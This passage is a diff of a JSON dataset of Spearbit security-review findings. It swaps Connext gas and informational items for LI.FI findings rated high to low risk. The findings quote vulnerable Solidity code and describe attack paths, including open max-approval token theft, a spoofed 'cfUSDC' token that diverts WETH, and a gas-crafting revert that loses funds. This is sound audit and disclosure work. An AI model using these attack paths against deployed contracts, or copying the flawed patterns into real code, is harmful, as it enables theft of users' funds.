function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { ... } else { // case 2: ERC20 asset ... token.safeIncreaseAllowance(address(executor), amount); if (reserveRecoverGas && gasleft() < _recoverGas) { token.safeTransfer(receiver, amount); ... return; // no safeApprove 0 } try executor.swapAndCompleteBridgeTokens{...} ... token.safeApprove(address(executor), 0); } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization PolygonSpokeConnector.sol#L61-L74," + "LIFI-retainer1", + "Severity: High Risk" ] }, { - "title": "Consider using bitmaps in _recordOutputAsSpent() of ArbitrumHubConnector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _recordOutputAsSpent() stores status via a mapping of booleans. However the equiv- alent function recordOutputAsSpent() of Arbritrum Nitro uses a mapping of bitmaps to store the status. Doing this saves gas. Note: this saving is possible because the index values are neatly ordered. function _recordOutputAsSpent(..., uint256 _index, ...) ... { ... require(!processed[_index], \"spent\"); ... processed[_index] = true; } Arbitrum version: function recordOutputAsSpent(..., uint256 index, ... ) ... { ... (uint256 spentIndex, uint256 bitOffset, bytes32 replay) = _calcSpentIndexOffset(index); if (_isSpent(bitOffset, replay)) revert AlreadySpent(index); spent[spentIndex] = (replay | bytes32(1 << bitOffset)); }", + "title": "CelerIMFacet incorrectly sets RelayerCelerIM as receiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "When assigning a bytes memory variable to a new variable, the new variable points to the same memory location. Changing any one variable updates the other variable. Here is a PoC as a foundry test function testCopy() public { Pp memory x = Pp({ a: 2, b: address(2) }); Pp memory y = x; y.b = address(1); assertEq(x.b, y.b); } Thus, when CelerIMFacet._startBridge() updates bridgeDataAdjusted.receiver, _bridgeData.receiver is implicitly updated too. This makes the receiver on the destination chain to be the relayer address. // case 'yes': bridge + dest call - send to relayer ILiFi.BridgeData memory bridgeDataAdjusted = _bridgeData; bridgeDataAdjusted.receiver = address(relayer); (bytes32 transferId, address bridgeAddress) = relayer .sendTokenTransfer{ value: msgValue }(bridgeDataAdjusted, _celerIMData); // call message bus via relayer incl messageBusFee relayer.forwardSendMessageWithTransfer{value: _celerIMData.messageBusFee}( _bridgeData.receiver, uint64(_bridgeData.destinationChainId), bridgeAddress, transferId, _celerIMData.callData );", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "LIFI-retainer1", + "Severity: High Risk" ] }, { - "title": "Move nonReentrant from process() to proveAndProcess()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function process() has a nonReentrant modifier. The function process() is also internal and is only called from proveAndProcess(), so it also possible to move the nonReentrant modifier to function proveAndProcess(). This would save repeatedly setting and unsetting the status of nonReentrant, which saves gas. function proveAndProcess(...) ... { ... for (uint32 i = 0; i < _proofs.length; ) { process(_proofs[i].message); unchecked { ++i; } } } function process(bytes memory _message) internal nonReentrant returns (bool _success) { ... }", + "title": "Max approval to any address is possible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "HopFacetOptimized.setApprovalForBridges() can be called by anyone to give max approval to any address for any ERC20 token. Any ERC20 token left in the Diamond can be stolen. function setApprovalForBridges(address[] calldata bridges,address[] calldata tokensToApprove) external { ... LibAsset.maxApproveERC20(..., type(uint256).max); ... }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Gas Optimization" + "LIFI-retainer1", + "Severity: High Risk" ] }, { - "title": "OpenZeppelin libraries IERC20Permit and EIP712 are final", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The OpenZeppelin libraries have changed IERC20Permit and EIP712 to a final version, so the final versions can be used. OZERC20.sol import \"@openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol\"; import {EIP712} from \"@openzeppelin/contracts/utils/cryptography/draft-EIP712.sol\"; draft-IERC20Permit.sol // EIP-2612 is Final as of 2022-11-01. This file is deprecated. import \"./IERC20Permit.sol\"; draft-EIP712.sol // EIP-712 is Final as of 2022-08-11. This file is deprecated. import \"./EIP712.sol\";", + "title": "Return value of low-level .call() not checked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Low-level primitive .call() doesn't revert in caller's context when the callee reverts. value is not checked, it can lead the caller to falsely believe that the call was successful. Receiver.sol uses .call() to transfer the native token to receiver. If receiver reverts, this can lead to locked ETH in Receiver contract.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: High Risk" ] }, { - "title": "Use Foundry's multi-chain tests", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Foundry supports multi-chain testing that can be useful to catch bugs earlier in the development process. Local multi-chain environment can be used to test many scenarios not possible on test chains or in production. Since Connectors are a critical part of NXTP protocol.", + "title": "Limits in LIFuelFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The facet LIFuelFacet is meant for small amounts, however, it doesn't have any limits on the funds sent. This might result in funds getting stuck due to insufficient liquidity on the receiving side. function _startBridge(...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { serviceFeeCollector.collectNativeGasFees{...}(...); } else { LibAsset.maxApproveERC20(...); serviceFeeCollector.collectTokenGasFees(...); ... } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Medium Risk" ] }, { - "title": "Risk of chain split", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Domains are considered immutable (unless implementation contracts are redeployed). In case of chain splits, both the forks will continue having the same domain and the recipients won't be able to differentiate which source chain of the message.", + "title": "The optimal version _depositAndSwap() isn't always used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function _depositAndSwap() of SwapperV2 has two versions. The second version keeps _- nativeReserve that is meant for fees. Several facets don't use this version although their bridge does require native fees. This could result in calls reverting due to insufficient native tokens left. function _depositAndSwap(...) ... // 4 parameter version /// @param _nativeReserve Amount of native token to prevent from being swept back to the caller function _depositAndSwap(..., uint256 _nativeReserve) ... // 5 parameter version", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Medium Risk" ] }, { - "title": "Use zkSync's custom compiler for compiling and (integration) testing", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The protocol needs to be deployed on zkSync. For deployment, the contracts would need to be compiled with zkSync's custom compiler. The bytecode generated by the custom Solidity compiler is quite dif- ferent compared to the original compiler. One thing to note is that cryptographic functions in Solidity are being replaced/inlined to static calls to zkSync's set of system precompile contracts.", + "title": "setContractOwner() is insufficient to lock down the owner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function transferOwnershipToZeroAddress() is meant to make the Diamond immutable. It sets the contract owner to 0. However, the contract owner can still be changed if there happens to be a pendingOwner. In that case confirmOwnershipTransfer() can still change the contract owner. function transferOwnershipToZeroAddress() external { // transfer ownership to 0 address LibDiamond.setContractOwner(address(0)); } function setContractOwner(address _newOwner) internal { DiamondStorage storage ds = diamondStorage(); address previousOwner = ds.contractOwner; ds.contractOwner = _newOwner; emit OwnershipTransferred(previousOwner, _newOwner); } function confirmOwnershipTransfer() external { Storage storage s = getStorage(); address _pendingOwner = s.newOwner; if (msg.sender != _pendingOwner) revert NotPendingOwner(); emit OwnershipTransferred(LibDiamond.contractOwner(), _pendingOwner); LibDiamond.setContractOwner(_pendingOwner); s.newOwner = LibAsset.NULL_ADDRESS; }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Medium Risk" ] }, { - "title": "Shared logic in SwapUtilsExternal and SwapUtils can be consolidated or their changes would need to be synched.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The SwapUtilsExternal library and SwapUtils share quite a lot of functions (events/...) logics . The main differences are: SwapUtilsExternal.swap does not have the following check but SwapUtils.swap does: // File: connext/libraries/SwapUtils.sol#L715 require(dx == tokenFrom.balanceOf(address(this)) - beforeBalance, \"no fee token support\"); This is actually one of the big/important diffs between current SwapUtils and SwapUtilsExternal. Other differ- ences are: Some functions are internal in SwapUtils, but they are external/public in SwapUtilsExternal. AmplificationUtils is basically copied in SwapUtilsExternal and its functions have been made external. SwapUtilsExternal does not implement exists. SwapUtilsExternal does not implement swapInternal. The SwapUtils's Swap struct has an extra field key as do the events in this file. Some inconsistent formatting. 109", + "title": "Receiver does not verify address from the originator chain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The Receiver contract is designed to receive the cross-chain call from libDiamond address on the destination chain. However, it does not verify the source chain address. An attacker can build a malicious _- callData. An attacker can steal funds if there are left tokens and there are allowances to the Executor. Note that the tokens may be lost in issue: \"Arithemetic underflow leading to unexpected revert and loss of funds in Receiver contract\". And there may be allowances to Executor in issue \"Receiver doesn't always reset allowance\"", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Medium Risk" ] }, { - "title": "Document why < 3s was chosen as the timestamp deviation cap for price reporting in setDirect- Price", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "setDirectPrice uses the following require statement to filter direct price reports by the owner. require(_timestamp - block.timestamp < 3, \"in future\"); Only prices with _timestamp within 3s of the current block timestamp are allowed to be registered.", + "title": "Arithemetic underflow leading to unexpected revert and loss of funds in Receiver contract.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The Receiver contract is designed to gracefully return the funds to users. It reserves the gas for recovering gas before doing swaps via executor.swapAndCompleteBridgeTokens. The logic of reserving gas for recovering funds is implemented at Receiver.sol#L236-L258 contract Receiver is ILiFi, ReentrancyGuard, TransferrableOwnership { // ... if (reserveRecoverGas && gasleft() < _recoverGas) { // case 1a: not enough gas left to execute calls receiver.call{ value: amount }(\"\"); // ... } // case 1b: enough gas left to execute calls try executor.swapAndCompleteBridgeTokens{ value: amount, gas: gasleft() - _recoverGas }(_transactionId, _swapData, assetId, receiver) {} catch { receiver.call{ value: amount }(\"\"); } // ... } 10 The gasleft() returns the remaining gas of a call. It is continuously decreasing. The second query of gasleft() is smaller than the first query. Hence, if the attacker tries to relay the transaction with a carefully crafted gas where gasleft() >= _recoverGas at the first quiry and gasleft() - _recoverGas reverts. This results in the token loss in the Receiver contract.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Medium Risk" ] }, { - "title": "Document what IConnectorManager entities would be passed to BridgeFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Document what type of IConnectorManager implementations would the owner or an admin set for the s.xAppConnectionManager. The only examples in the codebase are SpokeConnectors.", + "title": "Use of name to identify a token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "startBridgeTokensViaCelerIM() uses the token name to identify cfUSDC token. Another token with the same name can pass this check. An attacker can create a scam token with the name \"cfUSDC\" and a function canonical() returning a legit ERC20 token address, say WETH. If this token is passed as _bridge- Data.sendingAssetId, CelerIMFacet will transfer WETH. 11 if ( keccak256( abi.encodePacked( ERC20(_bridgeData.sendingAssetId).symbol() ) ) == keccak256(abi.encodePacked((\"cfUSDC\"))) ) { // special case for cfUSDC token asset = IERC20( CelerToken(_bridgeData.sendingAssetId).canonical() ); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Medium Risk" ] }, { - "title": "Second nonReentrant modifier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A previous version of xcall() had a nonReentrant modifier. This modifier was removed to enable execute() to call xcall() to return data to the originator chain. To keep a large part of the original protec- tion it is also possible to use a separate nonReentrant modifier (which uses a different storage variable) for xcall()/xcallIntoLocal(). This way both execute and xcall()/xcallIntoLocal() can be called once at the most. function xcall(...) ... { } function xcallIntoLocal(...) ... { } function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { }", + "title": "Unvalidated destination address in Gravity faucet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Data.destinationAddress address. The code does not validate if the provided destination address is in the valid bech32 format. there is an issue related to the validation of In the Gravity faucet, This can potentially cause issues when sending tokens to the destination address. If the provided address is not in the bech32 format, the tokens can be locked. Also, it can lead to confusion for the end-users as they might enter an invalid address and lose their tokens without any warning or error message. it is recommended to add a validation check for the _gravity-", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Medium Risk" ] }, { - "title": "Return 0 in swapToLocalAssetIfNeeded()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The return in function swapToLocalAssetIfNeeded() could also return 0. Which is somewhat more readable and could save some gas. Note: after studying the compiler output it might not actually save gas. 111 function swapToLocalAssetIfNeeded(...) ... { if (_amount == 0) { return _amount; } ... }", + "title": "Hardcode or whitelist the Thorswap vault address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The issue with this code is that the depositWithExpiry function allows the user to enter any arbitrary vault address, which could potentially lead to a loss of tokens. If a user enters an incorrect or non-existent vault address, the tokens could be lost forever. There should be some validation on the vault address to ensure that it is a valid and trusted address before allowing deposits to be made to it. Router 12 // Deposit an asset with a memo. ETH is forwarded, ERC-20 stays in ROUTER function deposit(address payable vault, address asset, uint amount, string memory memo) public payable nonReentrant{ ,! uint safeAmount; if(asset == address(0)){ safeAmount = msg.value; bool success = vault.send(safeAmount); require(success); } else { require(msg.value == 0, \"THORChain_Router: unexpected eth\"); // protect user from ,! accidentally locking up eth if(asset == RUNE) { safeAmount = amount; iRUNE(RUNE).transferTo(address(this), amount); iERC20(RUNE).burn(amount); } else { safeAmount = safeTransferFrom(asset, amount); // Transfer asset _vaultAllowance[vault][asset] += safeAmount; // Credit to chosen vault } } emit Deposit(vault, asset, safeAmount, memo); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Medium Risk" ] }, { - "title": "Use contract.code.length", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Retrieving the size of a contract is done in assembly, with extcodesize(). This can also be done in solidity which is more readable. Note: assembly might be a bit more gas efficient, especially if optimized even further: see issue \"isLocalOrigin can be optimized by using a named return parameter\". LibDiamond.sol function enforceHasContractCode(address _contract, string memory _errorMessage) internal view { uint256 contractSize; assembly { contractSize := extcodesize(_contract) } require(contractSize != 0, _errorMessage); } AssetLogic.sol function isLocalOrigin(address _token, AppStorage storage s) internal view returns (bool) { ... uint256 _codeSize; // solhint-disable-next-line no-inline-assembly assembly { _codeSize := extcodesize(_token) } return _codeSize != 0; }", + "title": "Check enough native assets for fee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function _startBridge() of SquidFacet adds _squidData.fee to _bridgeData.minAmount. It has verified there is enough native asset for _bridgeData.minAmount, but not for _squidData.fee. So this could use native assets present in the Diamond, although there normally shouldn't be any native assets left. A similar issue occurs in: CelerIMFacet DeBridgeFacet function _startBridge(...) ... { ... uint256 msgValue = _squidData.fee; if (LibAsset.isNativeAsset(address(sendingAssetId))) { msgValue += _bridgeData.minAmount; } ... ... squidRouter.bridgeCall{ value: msgValue }(...); ... }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "cap and liquidity tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function addLiquidity() also adds tokens to the Connext Diamond contract. If these tokens are the same as canonical tokens it wouldn't play nicely with the cap on these tokens. For others tokens it might also be relevant to have a cap. function addLiquidity(...) ... { ... token.safeTransferFrom(msg.sender, address(this), amounts[i]); ... }", + "title": "No check on native assets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The functions startBridgeTokensViaHopL1Native() , startBridgeTokensViaXDaiBridge() and startBridgeTokensViaMultichain() don't check _bridgeData.minAmount <= msg.value. So this could use na- tive assets that are still in the Diamond, although that normally shouldn't happen. This might be an issue in combination with reentrancy. function startBridgeTokensViaHopL1Native(...) ... { _hopData.hopBridge.sendToL2{ value: _bridgeData.minAmount }( ... ); ... } function startBridgeTokensViaXDaiBridge(...) ... { _startBridge(_bridgeData); } function startBridgeTokensViaMultichain(...) ... { if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) LibAsset.depositAsset(_bridgeData.sendingAssetId,_bridgeData.minAmount); } // no check for native assets _startBridge(_bridgeData, _multichainData); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Simplify _swapAssetOut()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _swapAssetOut() has relative complex logic where it first checks the tokens that will be received and then preforms a swap. It prevents reverting by setting the success flag. However function repayAave- Portal() still reverts if this flag is set. The comments show this was meant for reconcile(), however repaying the Aave dept in the reconcile phase no longer exists. So _swapAssetOut() could just revert if insufficiently tokens are provided. This way it would also be more similar to _swapAsset(). This will make the code more readable and safe some gas. AssetLogic.sol 113 function _swapAssetOut(...) ... returns ( bool success, ...) { ... if (ipool.exists()) { ... // Calculate slippage before performing swap. // NOTE: This is less efficient then relying on the `swapInternalOut` revert, but makes it ,! easier // to handle slippage failures (this can be called during reconcile, so must not fail). ... if (_maxIn >= ipool.calculateSwapInv(tokenIndexIn, tokenIndexOut, _amountOut)) { success = true; amountIn = ipool.swapInternalOut(tokenIndexIn, tokenIndexOut, _amountOut, _maxIn); } } else { ... uint256 _amountIn = pool.calculateSwapOutFromAddress(_assetIn, _assetOut, _amountOut); if (_amountIn <= _maxIn) { success = true; ... amountIn = pool.swapExactOut(_amountOut, _assetIn, _assetOut, _maxIn, block.timestamp + ,! 3600); } } } function swapFromLocalAssetIfNeededForExactOut(...) { ... return _swapAssetOut(_key, _asset, adopted, _amount, _maxIn); } PortalFacet.sol function repayAavePortal(...) { ... (bool success, ..., ...) = AssetLogic.swapFromLocalAssetIfNeededForExactOut(...); if (!success) revert PortalFacet__repayAavePortal_swapFailed(); ... }", + "title": "Missing doesNotContainDestinationCalls()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The functions startBridgeTokensViaLIFuel() and swapAndStartBridgeTokensViaLIFuel() doesn't have doesNotContainDestinationCalls(). function startBridgeTokensViaLIFuel(...) external payable nonReentrant refundExcessNative(payable(msg.sender)) doesNotContainSourceSwaps(_bridgeData) validateBridgeData(_bridgeData) { ... }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Return default false in the function end", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "verify function is missing a default return value. A return value of false can be added on the function end", + "title": "Race condition in _startBridge of LIFuelFacet.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "If the mapping for FEE_COLLECTOR_NAME hasn't been set up yet, then serviceFeeCollector will be address(0) in function _startBridge of LIFuelFacet. This might give unexpected results. function _startBridge(...) ... ( ... ServiceFeeCollector serviceFeeCollector = ServiceFeeCollector( LibMappings.getPeripheryRegistryMappings().contracts[FEE_COLLECTOR_NAME] ); ... } function getPeripheryContract(string calldata _name) external view returns (address) { return LibMappings.getPeripheryRegistryMappings().contracts[_name]; }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Change occurances of whitelist to allowlist", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In the codebase, whitelist is used to represent entities or objects that are allowed to be used or perform certain tasks. This word is not so accurate/suggestive and also can be offensive.", + "title": "Sweep tokens from Hopfacets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The Hop bridges HopFacet and HopFacetOptimized don't check that _bridgeData.sendingAssetId is the same as the bridge token. So this could be used to sweep tokens out of the Diamond contract. Normally there shouldn't be any tokens left at the Diamond, however, in this version there are small amounts left: Etherscan LiFiDiamond.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Incorrect comment on _mirrorConnector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The comment on _mirrorConnector is incorrect as this does not denote address of the spoke connector", + "title": "Missing emit in _swapAndCompleteBridgeTokens of Receiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "In function _swapAndCompleteBridgeTokens the catch of ERC20 tokens does an emit, while the comparable catch of native assets doesn't do an emit. function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { .. try ... {} catch { receiver.call{ value: amount }(\"\"); // no emit } ... } else { // case 2: ERC20 asset ... try ... {} catch { token.safeTransfer(receiver, amount); emit LiFiTransferRecovered(...); } } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "addStableSwapPool can have a more suggestive name and also better documentation for the _- stableSwapPool input parameter is recommended", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "1. The name suggests we are adding a new pool, although we are replacing/updating the current one. 2. _stableSwapPool needs to implement IStableSwap and it is supposed to be an external stable swap pool. It would be best to indicate that and possibly change the parameter input type to IStableSwap _stableSwap- Pool. 3. _stableSwapPool provided by the owner or an admin can have more than just 2 tokens as the @notice comment suggests. For example, the pool could have oUSDC, nextUSDC, oDAI, nextDAI, ... . Also there are no guarantees that the pooled tokens are pegged to each other. There is also a potential of having these pools have malicious or worthless tokens. What external pools does Connext team uses or is planning to use? This comment also applies to setupAsset and setupAssetWithDeployedRepresentation.", + "title": "Spam events in ServiceFeeCollector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The contract ServiceFeeCollector has several functions that collect fees and are permissionless. This could result in spam events, which might confuse the processing of the events. function collectTokenGasFees(...) ... { ... emit GasFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeGasFees(...) ... { ... emit GasFeesCollected(LibAsset.NULL_ADDRESS, receiver, feeAmount); } function collectTokenInsuranceFees(...) ... { ... emit InsuranceFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeInsuranceFees(...) ... { ... emit InsuranceFeesCollected(LibAsset.NULL_ADDRESS,receiver,feeAmount); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "_local has a misleading name in _addLiquidityForRouter and _removeLiquidityForRouter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The name for _local parameter is misleading, since it has been used in _addLiquidityForRouter (TokenId memory canonical, bytes32 key) = _getApprovedCanonicalId(_local); and in _removeLiquidityForRouter TokenId memory canonical = _getCanonicalTokenId(_local); and we have the following call flow path: AssetLogic.getCanonicalTokenId uses the adoptedToCanonical mapping first then check if the input parameter is a canonical token for the current domain, then uses representationToCanonical mapping. So here _local could be an adopted token.", + "title": "Function depositAsset() allows 0 amount of native assets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function depositAsset() disallows amount == 0 for ERC20, however it does allow amount == 0 for native assets. function depositAsset(address assetId, uint256 amount) internal { if (isNativeAsset(assetId)) { if (msg.value < amount) revert InvalidAmount(); } else { if (amount == 0) revert InvalidAmount(); ... } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Document _calculateSwap's and _calculateSwapInv's calculations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In _calculateSwap, the -1 in dy = xp[tokenIndexTo] - y - 1 is actually important. This is be- cause given no change in the asset balance of all tokens that already satisfy the stable swap invariant (dx = 0), getY (due to rounding errors) might return: y = xp[tokenIndexTo] which would in turn make dy = -1 that would revert the call. This case would need to be investigated. y = xp[tokenIndexTo] - 1 which would in turn make dy = 0 and so the call would return (0, 0). y = xp[tokenIndexTo] + 1 which would in turn make dy = -2 that would revert the call. This case would need to be investigated. 117 And similiarly in _calculateSwapInv, doing the same analysis for + 1 in dx = x - xp[tokenIndexFrom] + 1, if getYD returns: xp[tokenIndexFrom] +1, then dx = 2; xp[tokenIndexFrom], then dx = 1; xp[tokenIndexFrom] - 1, then dx = 0; Note, that the behavior is different and the call would never revert.", + "title": "Inadequate expiration time check in ThorSwapFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "According to Thorchain, the expiration time for certain operations should be set to +60 minutes. How- ever, there is currently no check in place to enforce this requirement. This oversight may lead to users inadvertently setting incorrect expiration times, potentially causing unexpected behavior or issues within the ThorSwapFacet.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Providing the from amount the same as the pool's from token balance, one might get a different return value compared to the current pool's to balance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Note, due to some imbalance in the asset pool, given x = xp[tokenIndexFrom] (aka, no change in asset balance of tokenIndexFrom token in the asset pool), we might see a decrease or increase in the asset balance of tokenIndexTo to bring back the pool to satisfying the stable swap invariant. One source that can introduce an imbalance is when the scaled amplification coefficient is ramping.", + "title": "Insufficient validation of bridgedTokenSymbol and sendingAssetId", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "During the code review, It has been noticed that the facet does not adequately check the corre- spondence between the bridgedTokenSymbol and sendingAssetId parameters. This oversight could allow for a random token to be sent to the Diamond, while still bridging another available token within the Diamond, even when no tokens should typically be left in the Diamond.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Document what type 0 means for TypedMemView", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In the following line, 0 is passed as the new type for a TypedMemView bytes29 _message.slice(PREFIX_LENGTH, _message.len() - PREFIX_LENGTH, 0) But there is no documentation as to what type 0 signifies.", + "title": "Check for destinationChainId in CBridgeFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Function _startBridge() of CBridgeFacet contains a check on destinationChainId and contains conversions to uint64. If both block.chainid and _bridgeData.destinationChainId) fit in an uint64 then the checks of modifier val- idateBridgeData are already sufficient. When _bridgeData.destinationChainId > type(uint64).max then this never reverts: if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); Then in the rest of the code it takes the truncated varion of the destinationChainId via uint64(_bridge- Data.destinationChainId), which can be any value, including block.chainid. So you can still bridge to the same chain. function _startBridge(ILiFi.BridgeData memory _bridgeData,CBridgeData memory _cBridgeData) private { if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); if (...) { cBridge.sendNative{ value: _bridgeData.minAmount }(... , ,! uint64(_bridgeData.destinationChainId),...); } else { ... cBridge.send(..., uint64(_bridgeData.destinationChainId), ...); } } modifier validateBridgeData(ILiFi.BridgeData memory _bridgeData) { ... if (_bridgeData.destinationChainId == block.chainid) { revert CannotBridgeToSameNetwork(); } ... }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Mixed use of require statements and 